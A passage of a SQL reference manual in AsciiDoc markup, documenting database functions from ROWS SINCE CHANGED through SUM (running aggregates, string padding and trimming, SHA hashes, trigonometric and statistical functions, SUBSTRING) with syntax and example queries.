(i1<i2)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR) (EXPR)\r\n--------------- ---------------\r\n ? 0\r\n 1 1\r\n 2 0\r\n 1 1\r\n 2 0\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[rows_since_changed_function]]\r\n== ROWS SINCE CHANGED Function\r\n\r\nThe ROWS SINCE CHANGED function is a sequence function that returns the\r\nnumber of rows counted since the specified set of values last changed in\r\nthe intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nROWS SINCE CHANGED is a {project-name} SQL extension.\r\n\r\n```\r\nROWS SINCE CHANGED (column-expression-list)\r\n```\r\n\r\n* `_column-expression-list_`\r\n+\r\nis a comma-separated list that specifies a derived column list\r\ndetermined by the evaluation of the column expression list.\r\nROWS SINCE CHANGED returns the number of rows counted since the\r\nvalues of _column-expression-list_ changed.\r\n\r\n[[considerations_for_rows_since_changed]]\r\n=== Considerations for ROWS SINCE CHANGED\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nFor the first row in the intermediate result table, the count is 1. For\r\nsubsequent rows that have the same value for _column-expression-list_ as\r\nthe previous row, the count is 1 plus the count\r\nin the previous row. For subsequent rows that have a different value of\r\n_column-expression-list_\r\nthan the previous row, the count is 1.\r\n\r\n[[examples_of_rows_since_changed]]\r\n=== Examples of ROWS SINCE CHANGED\r\n\r\n* Return the number of rows since the value _i1_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n* Return the number of rows since the values _i1_ and _ts_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1, ts)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n<<<\r\n[[rpad_function]]\r\n== RPAD Function\r\n\r\nThe RPAD function pads the right side of a string with the specified\r\nstring. Every character in the string, including multi-byte characters,\r\nis treated as one character.\r\n\r\nRPAD is a {project-name} SQL extension.\r\n\r\n```\r\nRPAD (str, len [, padstr])\r\n```\r\n\r\n* `_str_`\r\n+\r\ncan be an expression.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_len_`\r\n+\r\nidentifies the desired number of characters to be returned and can be an\r\nexpression but must be an integral value. If _len_ is equal to the\r\nlength of the string, no change is made. If _len_ is smaller than the\r\nstring size, the string is truncated.\r\n\r\n* `_pad-character_`\r\n+\r\ncan be an expression and may be a string.\r\n\r\n<<<\r\n[[examples_of_rpad_function]]\r\n=== Examples of RPAD Function\r\n\r\n* This function returns 'kite ':\r\n+\r\n```\r\nRPAD('kite', 7)\r\n```\r\n\r\n* This function returns 'ki':\r\n+\r\n```\r\nRPAD('kite', 2)\r\n```\r\n\r\n* This function returns 'kite0000':\r\n+\r\n```\r\nRPAD('kite', 8, '0')\r\n```\r\n\r\n* This function returns 'go fly a kite':\r\n+\r\n```\r\nRPAD('go fly a kite', 13, 'z')\r\n```\r\n\r\n* This function returns 'go fly a kitez'\r\n+\r\n```\r\nRPAD('go fly a kite', 14, 'z')\r\n```\r\n\r\n* This function returns 'kitegoflygoflygof':\r\n+\r\n```\r\nRPAD('kite', 17, 'gofly' )\r\n```\r\n\r\n<<<\r\n[[rtrim_function]]\r\n== RTRIM Function\r\n\r\nThe RTRIM function removes trailing spaces from a character string. If\r\nyou must remove any leading character other than space, use the TRIM\r\nfunction and specify the value of the character.\r\nSee the <<trim_function,TRIM Function>>.\r\n\r\nRTRIM is a {project-name} SQL extension.\r\n\r\n```\r\nRTRIM (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim trailing spaces.\r\n+\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_rtrim]]\r\n=== Considerations for RTRIM\r\n\r\n[[result_of_rtrim]]\r\n==== Result of RTRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _character-expression_.\r\n\r\n[[examples_of_rtrim]]\r\n=== Examples of RTRIM\r\n\r\n* Return ' Robert':\r\n+\r\n```\r\nRTRIM (' Robert ')\r\n```\r\n+\r\nSee <<trim_function,TRIM Function>> and <<ltrim_function,LTRIM Function>>.\r\n\r\n<<<\r\n[[runningavg_function]]\r\n== RUNNINGAVG Function\r\n\r\nThe RUNNINGAVG function is a sequence function that returns the average\r\nof non-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGAVG is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGAVG (_column-expression_)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGAVG returns the average of non-null values of _column-expression_\r\nup to and including the current row.\r\n\r\n[[considerations_for_runningavg]]\r\n=== Considerations for RUNNINGAVG\r\n\r\n[[equivalent_result]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGAVG is equivalent to:\r\n\r\n```\r\nRUNNINGSUM(column-expr) \/ RUNNINGCOUNT(*)\r\n```\r\n\r\n[[examples_of_runningavg]]\r\n=== Examples of RUNNINGAVG\r\n\r\n* Return the average of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGAVG(i1) AS avg_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\navg_i1\r\n--------------------\r\n 6215\r\n 17194\r\n 11463\r\n 9746\r\n 10190\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningcount_function]]\r\n== RUNNINGCOUNT Function\r\n\r\nThe RUNNINGCOUNT function is a sequence function that returns the number\r\nof rows up to and including the current row of an intermediate result\r\ntable ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGCOUNT {(*) | (column-expression)}\r\n```\r\n\r\n* `*`\r\n+\r\nas an argument causes RUNNINGCOUNT(*) to return the number of rows in\r\nthe intermediate result table up to and including the current row.\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If _column-expression_ is the argument, RUNNINGCOUNT returns\r\nthe number of rows containing non-null values of _column-expression_ in the\r\nintermediate result table up to and including the current row.\r\n\r\n\r\n[[considerations_for_runningcount]]\r\n=== Considerations for RUNNINGCOUNT\r\n\r\n[[no_distinct_clause]]\r\n==== No DISTINCT Clause\r\n\r\nThe RUNNINGCOUNT sequence function is defined differently from the COUNT\r\naggregate function. If you specify DISTINCT for the COUNT aggregate\r\nfunction, duplicate values are eliminated before COUNT is applied. You\r\ncannot specify DISTINCT for the RUNNINGCOUNT sequence function;\r\nduplicate values are counted.\r\n\r\n<<<\r\n[[examples_of_runningcount]]\r\n=== Examples of RUNNINGCOUNT\r\n\r\n* Return the number of rows that include non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGCOUNT (i1) AS count_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\ncount_i1\r\n------------\r\n 1\r\n 2\r\n 2\r\n 3\r\n 4\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmax_function]]\r\n== RUNNINGMAX Function\r\n\r\nThe RUNNINGMAX function is a sequence function that returns the maximum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMAX (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMAX returns the maximum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n\r\n[[examples_of_runningmax]]\r\n=== Examples of RUNNINGMAX\r\n\r\n* Return the maximum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMAX(i1) AS max_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmax_i1\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 28174\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmin_function]]\r\n== RUNNINGMIN Function\r\n\r\nThe RUNNINGMIN function is a sequence function that returns the minimum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMIN (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMIN returns the minimum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n[[examples_of_runningmin]]\r\n=== Examples of RUNNINGMIN\r\n\r\n* Return the minimum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMIN(i1) AS min_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmin_i1\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningstddev_function]]\r\n=== RUNNINGSTDDEV Function\r\n\r\nThe RUNNINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column up to and including the\r\ncurrent row of an intermediate result table ordered by a SEQUENCE BY\r\nclause in a SELECT statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSTDDEV (_column-expression_)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSTDDEV returns the standard deviation of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[considerations_for_runningstddev]]\r\n=== Considerations for RUNNINGSTDDEV\r\n\r\n[[equivalent_result]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGSTDDEV is equivalent to:\r\n\r\n```\r\nSQRT(RUNNINGVARIANCE(column-expression))\r\n```\r\n\r\n<<<\r\n[[examples_of_runningstddev]]\r\n=== Examples of RUNNINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGSTDDEV (i1) AS stddev_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nSTDDEV_I1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.25639147428923072E+004\r\n 1.09258501408357232E+004\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGSTDDEV(i1) AS DEC(18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 5527.357\r\n 14802.016\r\n 12563.914\r\n 10925.850\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningsum_function]]\r\n== RUNNINGSUM Function\r\n\r\nThe RUNNINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSUM (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSUM returns the sum of non-null values of _column-expression_ up\r\nto and including the current row.\r\n\r\n[[examples_of_runningsum]]\r\n=== Examples of RUNNINGSUM\r\n\r\n* Return the sum of non-null values of _i1_ up to and including the current\r\nrow:\r\n+\r\n```\r\nSELECT RUNNINGSUM(i1) AS sum_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nsum_i1\r\n--------------------\r\n 6215\r\n 34389\r\n 34389\r\n 38986\r\n 50952\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningvariance_function]]\r\n== RUNNINGVARIANCE Function\r\n\r\nThe RUNNINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column up to and including the current\r\nrow of an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGVARIANCE (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGVARIANCE returns the variance of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[examples_of_runningvariance]]\r\n=== Examples of RUNNINGVARIANCE\r\n\r\n* Return the variance of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGVARIANCE(i1) AS variance_i1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nvariance_i1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 2.41098840499999960E+008\r\n 2.19099696999999968E+008\r\n 1.57851953666666640E+008\r\n 1.19374201299999980E+008\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGVARIANCE (i1) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 241098840.500\r\n 219099697.000\r\n 157851953.666\r\n 119374201.299\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[second_function]]\r\n== SECOND Function\r\n\r\nThe SECOND function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 59 that represents the\r\ncorresponding second of the hour.\r\n\r\nSECOND is a {project-name} SQL extension.\r\n\r\n```\r\nSECOND (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_second]]\r\n=== Examples of SECOND\r\n\r\n* Return a numeric value that represents the second of the hour from the\r\n_ship_timestamp_ column:\r\n\r\n```\r\nSELECT start_date, ship_timestamp, SECOND(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- -----------\r\n2008-04-10 2008-04-21 08:15:00.000000 .000000\r\n```\r\n\r\n<<<\r\n[[sha_function]]\r\n== SHA Function\r\n\r\nCalculates an SHA-1 160-bit checksum for the string, as described in \r\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of \r\n40 hexadecimal digits, or NULL if the argument was NULL. \r\n\r\n[[examples_of_sha]]\r\n=== examples of SHA\r\n```\r\n>>SELECT SHA1('abc') from dual;\r\n\r\n(EXPR)\r\n-----------------------------------------\r\n'a9993e364706816aba3e25717850c26c9cd0d89d'\r\n```\r\n\r\n<<<\r\n[[sha2_function]]\r\n== SHA2 Function\r\n\r\nCalculates the SHA-2 family of hash functions (SHA-224, SHA-256, SHA-384, \r\nand SHA-512). The first argument is the cleartext string to be hashed. \r\nThe second argument indicates the desired bit length of the result, which \r\nmust have a value of 224, 256, 384, 512.\r\nIf either argument is NULL or the hash length is not one of the permitted values, \r\nthe return value is NULL. Otherwise, the function result is a hash value containing \r\nthe desired number of bits. See the notes at the beginning of this section \r\nabout storing hash values efficiently.\r\n\r\n[[examples_of_sha2]]\r\n=== examples of SHA2\r\n```\r\n>>SELECT SHA2('abc', 224) from dual;\r\n\r\n(EXPR)\r\n--------------------------------------------------------\r\n'23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7'\r\n```\r\n<<<\r\n[[sign_function]]\r\n== SIGN Function\r\n\r\nThe SIGN function returns an indicator of the sign of a numeric value\r\nexpression. If the value is less than zero, the function returns -1 as\r\nthe indicator. If the value is zero, the function returns 0. If the\r\nvalue is greater than zero, the function returns 1.\r\n\r\nSIGN is a {project-name} SQL extension.\r\n\r\n```\r\nSIGN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIGN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sign]]\r\n=== Examples of SIGN\r\n\r\n* Return the value -1:\r\n+\r\n```\r\nSIGN(-20 + 12)\r\n```\r\n\r\n* Return the value 0:\r\n+\r\n```\r\nSIGN(-20 + 20)\r\n```\r\n\r\n* Return the value 1:\r\n+\r\n```\r\nSIGN(-20 + 22)\r\n```\r\n\r\n<<<\r\n[[sin_function]]\r\n== SIN Function\r\n\r\nThe SIN function returns the SINE of a numeric value expression, where\r\nthe expression is an angle expressed in radians.\r\n\r\nSIN is a {project-name} SQL extension.\r\n\r\n```\r\nSIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sin]]\r\n=== Examples of SIN\r\n\r\n* This function returns the value 3.42052233254419840E-001, or\r\napproximately 0.3420, the sine of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nSIN (0.3491)\r\n```\r\n\r\n<<<\r\n[[sinh_function]]\r\n== SINH Function\r\n\r\nThe SINH function returns the hyperbolic sine of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nSINH is a {project-name} SQL extension.\r\n\r\n```\r\nSINH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SINH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sinh]]\r\n=== Examples of SINH\r\n\r\n* This function returns the value 1.60191908030082560E+000, or\r\napproximately 1.6019, the hyperbolic sine of 1.25:\r\n+\r\n```\r\nSINH (1.25)\r\n```\r\n\r\n<<<\r\n[[space_function]]\r\n=== SPACE Function\r\n\r\nThe SPACE function returns a character string consisting of a specified\r\nnumber of spaces, each of which is 0x20 or 0x0020, depending on the\r\nchosen character set.\r\n\r\nSPACE is a {project-name} SQL extension.\r\n\r\n```\r\nSPACE (length [, char-set-name])\r\n```\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to be returned. The number _count_\r\nmust be a value greater than or equal to zero of exact numeric data type\r\nand with a scale of zero. _length_ cannot exceed 32768 for the ISO8859-1\r\nor UTF8 character sets.\r\n\r\n* `_char-set-name_`\r\n+\r\ncan be ISO88591 or UTF8. If you do not specify this second argument, the\r\ndefault is the default character set.\r\n+\r\nThe returned character string will be of data type VARCHAR associated\r\nwith the character set specified by _char-set-name_.\r\n\r\n[[examples_of_space]]\r\n=== Examples of SPACE\r\n\r\n* Return three spaces:\r\n+\r\n```\r\nSPACE(3)\r\n```\r\n\r\n<<<\r\n[[sqrt_function]]\r\n== SQRT Function\r\n\r\nThe SQRT function returns the square root of a numeric value expression.\r\nSQRT is a {project-name} SQL extension.\r\n\r\n```\r\nSQRT (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SQRT function. The value of the argument must not be a\r\nnegative number. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sqrt]]\r\n=== Examples of SQRT\r\n\r\n* This function returns the value 5.19615242270663232e+000, or\r\napproximately 5.196:\r\n+\r\n```\r\nSQRT(27)\r\n```\r\n\r\n<<<\r\n[[stddev_function]]\r\n== STDDEV Function\r\n\r\nSTDDEV is an aggregate function that returns the standard deviation of a\r\nset of numbers. STDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nSTDDEV ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe STDDEV of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the STDDEV function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the standard deviation. The _expression_ cannot contain\r\nan aggregate function or a subquery. The DISTINCT clause specifies that\r\nthe STDDEV function operates on distinct values from the one-column\r\ntable derived from the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the standard deviation. _weight_ cannot\r\ncontain an aggregate function or a subquery. _weight_ is defined on\r\nthe same table as _expression_. The one-column table derived from the\r\nevaluation of _expression_ and the one-column table derived from the\r\nevaluation of _weight_ must have the same cardinality.\r\n\r\n[[considerations_for_stddev]]\r\n=== Considerations for STDDEV\r\n\r\n[[definition_of_stddev]]\r\n==== Definition of STDDEV\r\n\r\nThe standard deviation of a value expression is defined to be the square\r\nroot of the variance of the expression.\r\nSee <<variance_function,VARIANCE Function>>.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (if weight is not specified), {project-name} SQL returns a\r\nsystem-defined default setting of zero (and no error) if the number of\r\nrows in the table, or a group of the table, is equal to 1.\r\n\r\n[[data_type_of_the_result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table\r\nbut cannot include an aggregate function. These are valid:\r\n\r\n```\r\nSTDDEV (SALARY) STDDEV (SALARY * 1.1)\r\nSTDDEV (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[stddev_nulls]]\r\n==== Nulls\r\n\r\nSTDDEV is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, STDDEV returns NULL.\r\n\r\n[[float54_and_double_precision_data]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nSTDDEV. If SUM(x * x) exceeds the value of 1.15792089237316192e77 during the computation\r\nof STDDEV(x), a numeric overflow occurs.\r\n\r\n<<<\r\n[[examples_of_stddev]]\r\n=== Examples of STDDEV\r\n\r\n* Compute the standard deviation of the salary of the current employees:\r\n+\r\n```\r\nSELECT STDDEV(salary) AS StdDev_Salary FROM persnl.employee;\r\n\r\nSTDDEV_SALARY\r\n-------------------------\r\n 3.57174062500000000E+004\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the standard deviation of the cost of parts in the current\r\ninventory:\r\n+\r\n```\r\nSELECT STDDEV (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 7.13899499999999808E+006\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[substring_function]]\r\n== SUBSTRING\/SUBSTR Function\r\n\r\nThe SUBSTRING function extracts a substring out of a given character\r\nexpression. It returns a character string of data type VARCHAR, with a\r\nmaximum length equal to the smaller of these two:\r\n\r\n\r\n* The fixed length of the input string (for CHAR-type strings) or the\r\nmaximum variable length (for VARCHAR-type strings)\r\n* The value of the length argument (when a constant is specified) or\r\n32708 (when a non-constant is specified)\r\n\r\nSUBSTR is equivalent to SUBSTRING.\r\n\r\n```\r\nSUBSTRING (character-expr FROM start-position [FOR length])\r\n```\r\n\r\nor:\r\n\r\n```\r\nSUBSTRING (character-expr, start-position [, length])\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to extract the substring. The\r\nsource string is an SQL character value expression. The operand is the\r\nresult of evaluating _character-expr_. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start-position_`\r\n+\r\nspecifies the starting position _start-position_ within _character-expr_\r\nat which to start extracting the substring. _start-position_ must be a\r\nvalue with an exact numeric data type and a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to extract from _character-expr_.\r\nKeep in mind that every character, including multi-byte characters,\r\ncounts as one character. _length_ is the length of the extracted\r\nsubstring and must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero. The _length_ field is\r\noptional, so if you do not specify the substring _length_, all\r\ncharacters starting at _start-position_ and continuing until the end of\r\nthe character expression are returned.\r\n+\r\nThe length field is optional. If you do not specify it, all characters\r\nstarting at _start-position_\r\nand continuing until the end of the _character-expr_ are returned.\r\n\r\n[[alternative_forms]]\r\n=== Alternative Forms\r\n\r\n* The SUBSTRING function treats SUBSTRING( _string_ FOR _int_ )\r\nequivalent to SUBSTRING( _string_ FROM 1 FOR _int_ ). The {project-name}\r\ndatabase software already supports the ANSI standard form as:\r\n+\r\n```\r\nSUBSTRING(string FROM int [ FOR int ])\r\n```\r\n\r\n* The SUBSTRING function treats SUBSTRING (_string_, Fromint)\r\nequivalent to SUBSTRING(_string_ FROM _Fromint_). The {project-name}\r\ndatabase software already supports SUBSTRING (_string_, _Fromint_,\r\n_Forint_) as equivalent to the ANSI standard form:\r\n+\r\n```\r\nSUBSTRING(string FROM Fromint FOR Forint)\r\n```\r\n\r\n[[considerations_for_substring]]\r\n=== Considerations for SUBSTRING\/SUBSTR\r\n\r\n[[requirements_for_the_expression_length_and_start_position]]\r\n==== Requirements for the Expression, Length, and Start Position\r\n\r\n* The data types of the substring length and the start position must be\r\nnumeric with a scale of zero. Otherwise, an error is returned.\r\n* If the sum of the start position and the substring length is greater\r\nthan the length of the character expression, the substring from the\r\nstart position to the end of the string is returned.\r\n* If the start position is greater than the length of the character\r\nexpression, an empty string ('') is returned.\r\n* The resulting substring is always of type VARCHAR. If the source\r\ncharacter string is an up-shifted CHAR or VARCHAR string, the result is\r\nan up-shifted VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_substring]]\r\n=== Examples of SUBSTRING\/SUBSTR\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING('Robert John Smith' FROM 0 FOR 3)\r\nSUBSTR('Robert John Smith' FROM 0 FOR 3)\r\n```\r\n\r\n* Extract 'John':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 4)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 4)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8)\r\nSUBSTR ('Robert John Smith' FROM 8)\r\n```\r\n\r\n* Extract 'Robert John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 1 FOR 17)\r\nSUBSTR ('Robert John Smith' FROM 1 FOR 17)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 15)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 15)\r\n```\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM -2 FOR 5)\r\nSUBSTR ('Robert John Smith' FROM -2 FOR 5)\r\n```\r\n\r\n* Extract an empty string '':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 0)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 0)\r\n```\r\n\r\n<<<\r\n[[sum_function]]\r\n== SUM Function\r\n\r\nSUM is an aggregate function that returns the sum of a set of numbers.\r\n\r\n```\r\nSUM ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe SUM of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. If you specify DISTINCT, duplicate\r\nvalues are eliminated before the SUM function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value expression that determines the\r\nvalues to sum. The _expression_ cannot contain an aggregate function or\r\na subquery. The DISTINCT clause specifies that the SUM function operates\r\non distinct values from the one-column table derived from the evaluation\r\nof _expression_. All nulls are eliminated before the function is\r\napplied to the set of values. If the result table is empty, SUM returns\r\nNULL. See <<expressions,Expressions>>.\r\n\r\n[[considerations_for_sum]]\r\n=== Considerations for SUM\r\n\r\n[[data_type_and_scale_of_the_result]]\r\n==== Data Type and Scale of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument. The scale of the\r\nresult is the same as the scale of the argument. If the argument has no\r\nscale, the result is truncated.\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable — but cannot include an aggregate function. The valid expressions\r\nare:\r\n\r\n```\r\nSUM (SALARY)\r\nSUM (SALARY * 1.1)\r\nSUM (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[examples_of_sum]]\r\n=== Examples of SUM\r\n\r\n* Compute the total value of parts in the current 